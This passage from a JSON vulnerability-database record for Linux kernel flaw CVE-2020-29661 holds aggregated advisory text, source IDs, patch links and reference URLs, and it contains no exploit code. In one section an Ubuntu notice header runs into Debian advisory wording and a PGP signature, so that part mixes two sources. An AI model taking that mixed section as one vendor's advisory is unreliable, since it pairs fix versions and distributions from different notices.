VM with dot in network name fails to start with unclear message\n1854098 - NodeNetworkState on workers doesn\u0027t have \"status\" key due to nmstate-handler pod failure to run \"nmstatectl show\"\n1856347 - SR-IOV : Missing network name for sriov during vm setup\n1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS\n1859235 - Common Templates - after upgrade there are 2  common templates per each os-workload-flavor combination\n1860714 - No API information from `oc explain`\n1860992 - CNV upgrade - users are not removed from privileged  SecurityContextConstraints\n1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem\n1866593 - CDI is not handling vm disk clone\n1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs\n1868817 - Container-native Virtualization 2.6.0 Images\n1873771 - Improve the VMCreationFailed error message caused by VM low memory\n1874812 - SR-IOV: Guest Agent  expose link-local ipv6 address  for sometime and then remove it\n1878499 - DV import doesn\u0027t recover from scratch space PVC deletion\n1879108 - Inconsistent naming of \"oc virt\" command in help text\n1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running\n1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message\n1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used\n1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, *before* the NodeNetworkConfigurationPolicy is applied\n1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. \n1891285 - Common templates and kubevirt-config cm - update machine-type\n1891440 - [v2v][VMware to CNV VM import API]Source VM with no network interface fail with unclear error\n1892227 - [SSP] cluster scoped resources are not being reconciled\n1893278 - openshift-virtualization-os-images namespace not seen by user\n1893646 - [HCO] Pod placement configuration - dry run is not performed for all the configuration stanza\n1894428 - Message for VMI not migratable is not clear enough\n1894824 - [v2v][VM import] Pick the smallest template for the imported VM, and not always Medium\n1894897 - [v2v][VMIO] VMimport CR is not reported as failed when target VM is deleted during the import\n1895414 - Virt-operator is accepting updates to the placement of its workload components even with running VMs\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1898072 - Add Fedora33 to Fedora common templates\n1898840 - [v2v] VM import VMWare to CNV Import 63 chars vm name should not fail\n1899558 - CNV 2.6 - nmstate fails to set state\n1901480 - VM disk io can\u0027t worked if namespace have label kubemacpool\n1902046 - Not possible to edit CDIConfig (through CDI CR / CDIConfig)\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1903014 - hco-webhook pod in CreateContainerError\n1903585 - [v2v] Windows 2012 VM imported from RHV goes into Windows repair mode\n1904797 - [VMIO][vmware] A migrated RHEL/Windows VM starts in emergency mode/safe mode when target storage is NFS and target namespace is NOT \"default\"\n1906199 - [CNV-2.5] CNV Tries to Install on Windows Workers\n1907151 - kubevirt version is not reported correctly via virtctl\n1907352 - VM/VMI link changes to `kubevirt.io~v1~VirtualMachineInstance` on CNV 2.6\n1907691 - [CNV] Configuring NodeNetworkConfigurationPolicy caused \"Internal error occurred\" for creating datavolume\n1907988 - VM loses dynamic IP address of its default interface after migration\n1908363 - Applying NodeNetworkConfigurationPolicy for different NIC than default disables br-ex bridge and nodes lose connectivity\n1908421 - [v2v] [VM import RHV to CNV] Windows imported VM boot failed: INACCESSIBLE BOOT DEVICE error\n1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference\n1909458 - [V2V][VMware to CNV VM import via api using VMIO] VM import  to Ceph RBD/BLOCK fails on \"qemu-img: /data/disk.img\" error\n1910857 - Provide a mechanism to enable the HotplugVolumes feature gate via HCO\n1911118 - Windows VMI LiveMigration / shutdown fails on \u0027XML error: non unique alias detected: ua-\u0027)\n1911396 - Set networkInterfaceMultiqueue false in rhel 6 template for e1000e interface\n1911662 - el6 guests don\u0027t work properly if virtio bus is specified on various devices\n1912908 - Allow using \"scsi\" bus for disks in template validation\n1913248 - Creating vlan interface on top of a bond device via NodeNetworkConfigurationPolicy fails\n1913320 - Informative message needed with virtctl image-upload, that additional step is needed from the user\n1913717 - Users should have read permitions for golden images data volumes\n1913756 - Migrating to Ceph-RBD + Block fails when skipping zeroes\n1914177 - CNV does not preallocate blank file data volumes\n1914608 - Obsolete CPU models (kubevirt-cpu-plugin-configmap) are set on worker nodes\n1914947 - HPP golden images - DV shoudld not be created with WaitForFirstConsumer\n1917908 - [VMIO] vmimport pod fail to create when using ceph-rbd/block\n1917963 - [CNV 2.6] Unable to install CNV disconnected - requires kvm-info-nfd-plugin which is not mirrored\n1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration\n1920576 - HCO can report ready=true when it failed to create a CR for a component operator\n1920610 - e2e-aws-4.7-cnv consistently failing on Hyperconverged Cluster Operator\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1923979 - kubernetes-nmstate: nmstate-handler pod crashes when configuring bridge device using ip tool\n1927373 - NoExecute taint violates pdb; VMIs are not live migrated\n1931376 - VMs disconnected from nmstate-defined bridge after CNV-2.5.4-\u003eCNV-2.6.0 upgrade\n\n5. =========================================================================\nUbuntu Security Notice USN-5130-1\nNovember 09, 2021\n\nlinux vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n(CVE-2020-29660)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-3.13.0-188-generic  3.13.0-188.239\n  linux-image-3.13.0-188-lowlatency  3.13.0-188.239\n  linux-image-generic             3.13.0.188.197\n  linux-image-lowlatency          3.13.0.188.197\n  linux-image-server              3.13.0.188.197\n  linux-image-virtual             3.13.0.188.197\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nCVE-2020-27815\n\n    A flaw was reported in the JFS filesystem code allowing a local\n    attacker with the ability to set extended attributes to cause a\n    denial of service. \n\nCVE-2020-27825\n\n    Adam \u0027pi3\u0027 Zabrocki reported a use-after-free flaw in the ftrace\n    ring buffer resizing logic due to a race condition, which could\n    result in denial of service or information leak. \n\nCVE-2020-27830\n\n    Shisong Qin reported a NULL pointer dereference flaw in the Speakup\n    screen reader core driver. \n\nCVE-2020-28374\n\n    David Disseldorp discovered that the LIO SCSI target implementation\n    performed insufficient checking in certain XCOPY requests. An\n    attacker with access to a LUN and knowledge of Unit Serial Number\n    assignments can take advantage of this flaw to read and write to any\n    LIO backstore, regardless of the SCSI transport settings. \n\nCVE-2020-29568 (XSA-349)\n\n    Michael Kurth and Pawel Wieczorkiewicz reported that frontends can\n    trigger OOM in backends by updating a watched path. \n\nCVE-2020-29569 (XSA-350)\n\n    Olivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\n    flaw which can be triggered by a block frontend in Linux blkback. A\n    misbehaving guest can trigger a dom0 crash by continuously\n    connecting / disconnecting a block frontend. A local attacker can take advantage of\n    this flaw for memory corruption or privilege escalation. \n\nCVE-2020-36158\n\n    A buffer overflow flaw was discovered in the mwifiex WiFi driver\n    which could result in denial of service or the execution of\n    arbitrary code via a long SSID value. \n\nCVE-2021-3347\n\n    It was discovered that PI futexes have a kernel stack use-after-free\n    during fault handling. An unprivileged user could use this flaw to\n    crash the kernel (resulting in denial of service) or for privilege\n    escalation. \n\nCVE-2021-20177\n\n    A flaw was discovered in the Linux implementation of string matching\n    within a packet. A privileged user (with root or CAP_NET_ADMIN) can\n    take advantage of this flaw to cause a kernel panic when inserting\n    iptables rules. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.19.171-2. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAXj9pfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Tf5Q//RdQojeX7VtJ61PsVXRszZh9DJ3PUo64NheFU+QWUYO7F6NUD3fMxiS9K\nI8Sgfsm28x7RBambjW6TZYseJhQd9aSvaANnPdUj/eZ9P3xBhXFM8wzISosUWgfO\n2IIV40oOVj943+BzfIQiq1mgQtwLjh3pNTZAEpjnzD96Tc9tXGyW9/3iGkUHIQjv\ngUTSvoLIUAI4XfNNUjnok+6kPDyEEIdiwJaGDG+UPZ6HNL/hrG3A4klQc+X7KK5K\nNCOzl4Wl5pZN7u2Ietn3sFMsNJkMrsfLlVyj8J9PgNwbFQh/+RuvzFcONlQ8iaD9\nkx42gkLwjl+hM2UeCpvQndzwqXKPKc6CjFemDj7KWzVA+KkVBRTXCGb9K9CasZOZ\n0e/cu+5rjYGubIE3e/jo3Gmhp/fm9fXHESbruxuP+gjdbKcyrGrokNucjRvp6FPP\nrCX+e7OjsZwWGBIcAw+gDAZkDO7PFEoRtlByF2LmxxNvTufZQZHX8NwVyABCdpZi\nVQLLeQNXN1pJ4d1NPWgTlKfEmH0sGVQRHCliTkBZmIjvo+y1JClUDBAlWOS4YYQL\n4Z4oe1qtOX9z+NkqDqcbgfWw69Q2PipNN3TR5YcBXvOtVhvL+/WFGiooJDqxkdCD\nj3wO/r/1gut/bK/OJnjmOB9J5OXP+cHxYtrhPqXFy2Hzkgj1CRU=\n=u23W\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-29661",
        "trust": 4.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2020/12/10/1",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "160681",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164950",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-24-074-07",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU93656033",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161656",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161607",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161710",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164812",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0189",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0348",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0377",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0166",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0964",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0791",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2781",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1193",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0837",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2604",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0717",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0589",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1339",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3871",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1093",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0864",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0768",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0924",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3743",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162020",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162878",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161250",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161868",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161823",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162253",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161556",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042135",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062111",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052006",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021092209",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-29661",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161835",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161742",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162028",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169012",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "id": "VAR-202012-1546",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-07-23T20:50:20.423000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fix\u00a0-\u003epgrp\u00a0locking\u00a0in\u00a0tiocspgrp()",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=136912"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210537 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-alt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210354 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20210558 - security advisory"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-29661 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-032",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-032"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-031",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-031"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-034",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-034"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-033",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-033"
      },
      {
        "title": "IBM: Security Bulletin: There are multiple vulnerabilities in the Linux Kernel used in IBM Elastic Storage System",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d39f316392b1adf4ca22f6ef041af00f"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1477",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1477"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-019"
      },
      {
        "title": "Debian Security Advisories: DSA-4843-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=b95030247235becf9e017bec31e9d503"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1588",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1588"
      },
      {
        "title": "IBM: Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e9d6f12dfd14652e2bb7e5c28ded162b"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "https://github.com/lcatro/cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "veracode-container-security-finding-parser",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-667",
        "trust": 1.0
      },
      {
        "problemtype": "Use of freed memory (CWE-416) [NVD evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": " improper lock (CWE-667) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2020/12/10/1"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/160681/linux-tiocspgrp-broken-locking.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/164950/kernel-live-patch-security-notice-lsn-0082-1.html"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=54ffccbf053b5b6ca4f6e45094b942fab92a25fc"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210122-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2021/dsa-4843"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/02/msg00018.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/mz7oakaefaxqrgbzk4lyuwincd3d2xcl/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93656033/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-07"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-29661"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/mz7oakaefaxqrgbzk4lyuwincd3d2xcl/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bob25su6xul4tnp7kb63wnzsytiyfdpp/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161710/red-hat-security-advisory-2021-0763-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0837"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-there-are-multiple-vulnerabilities-in-the-linux-kernel-used-in-ibm-elastic-storage-system-3/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-use-after-free-via-tiocspgrp-34082"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161250/red-hat-security-advisory-2021-0354-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3871"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2781"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042135"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021092209"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0189/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0377/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161656/red-hat-security-advisory-2021-0719-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162878/red-hat-security-advisory-2021-2164-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1093"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162253/red-hat-security-advisory-2021-1288-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-05-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-affected-by-multiple-vulnerabilities-4/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052006"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0589"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0864"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0964"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0348/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0924"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0768"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1339"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062111"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0791"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164812/ubuntu-security-notice-usn-5130-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161823/red-hat-security-advisory-2021-0862-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0166/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161607/red-hat-security-advisory-2021-0689-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3743"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6525030"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202111-0000001218088197"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161868/red-hat-security-advisory-2021-0940-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162020/red-hat-security-advisory-2021-1028-01.html"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-25705"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14351"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25705"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0444"
      },
      {
        "trust": 0.2,
